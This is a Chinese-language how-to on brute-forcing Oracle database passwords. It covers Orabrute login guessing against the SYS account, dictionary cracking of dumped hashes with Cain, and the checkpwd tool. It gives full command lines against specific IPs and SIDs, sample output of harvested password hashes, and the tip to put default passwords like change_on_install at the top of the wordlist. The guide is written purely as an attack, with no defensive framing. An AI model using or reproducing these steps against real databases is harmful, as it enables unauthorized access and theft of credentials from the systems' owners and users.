暴力破解Oracle數據庫密碼的方法

暴力破解Oracle數據庫密碼的方法

一、前提條件

    要連接遠程的 Oracle 數據庫，需要知道 SID，用戶名， 密碼，當然還有最重要的 IP 地址。SID 如果被管理 員修改的話，可以利用 sidguess 來進行破解，速度非常的快，至於成功與否，就要看你的字典配置了。可以得知選擇遠程破解Oracle 的最好帳戶是SYS，因為此帳戶永遠有效。在Oracle10g以前的版本在安裝的時候並沒有提示修改SYS 的默認密碼，Oracle10g 雖然提示修改密碼了，但是並沒有檢查密碼的復雜性。

二、破解方法

1、使用Orabrute 工具來進行遠程破解

可以使用Orabrute 工具來進行遠程破解，在使用這個工具的時候，需要系統提前安裝好Sqlplus，該工具的
原理很簡單，就是不停的調用Sqlplus 然后進行登錄驗證，帳戶選擇的是SYS，密碼則為password.txt 中的密碼單詞。只要登錄成功，就會調用selectpassword.sql 腳本抓取出在SYS.USER$表中的其他用戶的哈希值，然后退出程序。這里有個注意的地方，當第二次運行Orabrute 的時候，需要刪除或移動同目錄下的前一次運行Orabrute 時生成的thepasswordsarehere.txt 和output.txt 文件。
Orabrute 的使用方法為：

D:/soft/oracle/Orabrute>orabrute
Orabrute v 1.2 by Paul M. Wright and David J. Morgan:
orabrute <hostip> <port> <sid> <millitimewait>
D:/soft/oracle/Orabrute>

Orabrute 的破解速度比較慢，建議在password.txt開頭加上諸如change_on_install這樣你認為可能的密碼。

D:/soft/oracle/Orabrute>orabrute 172.19.111.37 1521 orcl 2000
Orabrute v 1.2 by Paul M. Wright and David J. Morgan:
orabrute <hostip> <port> <sid> <millitimewait>sqlplus.exe -S -L "SYS/change_on_install@172.19.111.37:1521/orcl" as sysdba @selectpassword.sql

NAME                           PASSWORD
------------------------------ ------------------------------
SYS                            D4C5016086B2DC6A
PUBLIC
CONNECT
RESOURCE
DBA
SYSTEM                         D4DF7931AB130E37
SELECT_CATALOG_ROLE
EXECUTE_CATALOG_ROLE

2、使用Cain工具破解Oracle密碼

首先，通過SQLPlus獲得用戶名和密碼的Hash，SQL> select username,password from dba_users;

USERNAME
------------------------------------------------------------
PASSWORD
------------------------------------------------------------
SYS
8A8F025737A9097A

SYSTEM
2D594E86F93B17A1

DBSNMP
FFF45BB2C0C327EC


USERNAME
------------------------------------------------------------
PASSWORD
------------------------------------------------------------
SYSMAN
2CA614501F09FCCC

MGMT_VIEW
7967E9F7D325932C

ABC2
2BC5EEFA22EE5E5E
其次，安裝Cain，安裝后的截圖如下：

 

 

最后，利用Cain的crack功能對Oracle的密碼進行字典猜解，步驟如下：

 

第一步：運行cain，點擊Craker中的Oracle

暴力破解Oracle數據庫密碼的方法

 

第二步：輸入用戶名和密碼Hash，如：SYS 8A8F025737A9097A

 

暴力破解Oracle數據庫密碼的方法

 

第二步：點擊Start，等5分鍾后會發現破解的結果

暴力破解Oracle數據庫密碼的方法
暴力破解Oracle數據庫密碼的方法

破解后的密碼為oracle

3、  Oracle Checkpasswd_big 破解密碼


C:/oracle_checkpwd_big>checkpwd system/wy@//192.168.1.116:1521/NBO password_file

下載地址http://www.red-database-security.com/software/checkpwd.html